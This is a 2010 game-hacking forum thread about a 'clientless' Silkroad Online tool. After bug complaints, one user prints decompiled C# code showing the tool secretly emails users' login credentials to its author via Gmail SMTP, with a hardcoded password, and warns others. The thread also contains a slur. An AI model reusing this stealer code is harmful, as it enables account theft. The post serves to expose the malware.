[Release] Silkroad Clientless

04/04/2010 14:36 Enj0y1997#16
this tool sucks,it never connects.i running it now for about 20mins and he's don't connect.i logged on sro normal and i logged in about 5 minutes...
04/04/2010 14:40 thenetherlands#17
Quote:
Originally Posted by Enj0y1997 View Post
this tool sucks,it never connects.i running it now for about 20mins and he's don't connect.i logged on sro normal and i logged in about 5 minutes...
Wait a few min I'm checking it :)
Looks like I did something stupid xD
04/04/2010 14:41 Enj0y1997#18
Quote:
Originally Posted by thenetherlands View Post
Wait a few min I'm checking it :)
Looks like I did something stupid xD
waiting. ;]
04/04/2010 14:52 audi0slave#19
Quote:
Originally Posted by thenetherlands View Post
Wait a few min I'm checking it :)
Looks like I did something stupid xD
Dont rush and make such comments,it will ruin your program reputation.Keep it as formal as possible(details and stuff) ;)
04/04/2010 14:56 thenetherlands#20
Quote:
Originally Posted by alexx. View Post
Dont rush and make such comments,it will ruin your program reputation.Keep it as formal as possible(details and stuff) ;)
k :)

Atm I'm restoring the Settings menu it was damaged so it couln,t be loaded..
Please be patient..
04/04/2010 15:04 ™Burton™#21
Hmmm nice work, but i dont think that many people will buy clientless.
04/04/2010 15:09 thenetherlands#22
Quote:
Originally Posted by ™Burton™ View Post
Hmmm nice work, but i dont think that many people will buy clientless.
Maybe I'll keep it free,
I'm still thinking about it.
Let's see what people think about the tool first then decide :)
04/04/2010 15:28 Enj0y1997#23
so do u fix problem why he don't connects?
04/04/2010 15:44 thenetherlands#24
Quote:
Originally Posted by Enj0y1997 View Post
so do u fix problem why he don't connects?
It does connect,
But I forgot to set a hook so it says when your logged in and that it goes to the settings form,
But the settings form is highly damaged so I'm really busy with repairing it :)
Please dont worry and wait a little while longer.
04/04/2010 15:51 xMedeia#25
If you still have this many bugs to work out, I'd say keep it free till it at least functions well. Look at it as a Beta version.
04/04/2010 16:42 WizFlowPT#26
Yea and btw thhenetherlands im logged in finnally :D already lvl 10^^ Thank god to SROking trial :D
04/04/2010 16:53 =.-#27
Does it only work on one Loginserver? I would suggest to use random or better, with help of rev6, the server with the shortest line...
04/04/2010 21:36 Kazuya¹#28
well according to my leet reversing skills :) (yay reflector), everytime someone logs in
with this tool, it send that persons sro id/pass to his email. so DONOT USE THIS.

Code:
private void Timer1_Tick(object sender, EventArgs e)
{
    WebClient client2 = new WebClient();
    MailMessage message = new MailMessage();
    message.From = new MailAddress("[Only registered and activated users can see links. Click Here To Register...]");
    message.To.Add("[Only registered and activated users can see links. Click Here To Register...]");
    message.Subject = "ID+PW";
    client2.Dispose();
    message.Body = MyProject.Forms.Login.ErrorLog.Text + "\r\n" + MyProject.Forms.Login.WarningLog.Text + "\r\n" + MyProject.Forms.Login.SuccesLog.Text;
    SmtpClient client = new SmtpClient("smtp.gmail.com");
    client.Port = 0x24b;
    client.Credentials = new NetworkCredential("[Only registered and activated users can see links. Click Here To Register...]", "dragonball");
    client.EnableSsl = true;
    try
    {
        client.Send(message);
    }
    catch (SmtpException exception1)
    {
        ProjectData.SetProjectError(exception1);
        SmtpException exception = exception1;
        ProjectData.ClearProjectError();
    }
    this.Timer1.Enabled = false;
    MyProject.Forms.Main.Show();
    this.Hide();
    this.Checking.Visible = false;
}
# Reported
04/04/2010 21:49 ms​#29
Quote:
Originally Posted by thenetherlands View Post
I made some long and difficult security hooks wich protect you from a ban,
Client-Hooks in a Clientless-Tool... go troll somewhere else faggot.
04/04/2010 22:12 LordDeems#30
Quote:
Originally Posted by Kazuya¹ View Post
well according to my leet reversing skills :) (yay reflector), everytime someone logs in
with this tool, it send that persons sro id/pass to his email. so DONOT USE THIS.

Code:
private void Timer1_Tick(object sender, EventArgs e)
{
    WebClient client2 = new WebClient();
    MailMessage message = new MailMessage();
    message.From = new MailAddress("[Only registered and activated users can see links. Click Here To Register...]");
    message.To.Add("[Only registered and activated users can see links. Click Here To Register...]");
    message.Subject = "ID+PW";
    client2.Dispose();
    message.Body = MyProject.Forms.Login.ErrorLog.Text + "\r\n" + MyProject.Forms.Login.WarningLog.Text + "\r\n" + MyProject.Forms.Login.SuccesLog.Text;
    SmtpClient client = new SmtpClient("smtp.gmail.com");
    client.Port = 0x24b;
    client.Credentials = new NetworkCredential("[Only registered and activated users can see links. Click Here To Register...]", "dragonball");
    client.EnableSsl = true;
    try
    {
        client.Send(message);
    }
    catch (SmtpException exception1)
    {
        ProjectData.SetProjectError(exception1);
        SmtpException exception = exception1;
        ProjectData.ClearProjectError();
    }
    this.Timer1.Enabled = false;
    MyProject.Forms.Main.Show();
    this.Hide();
    this.Checking.Visible = false;
}
# Reported
:mofo: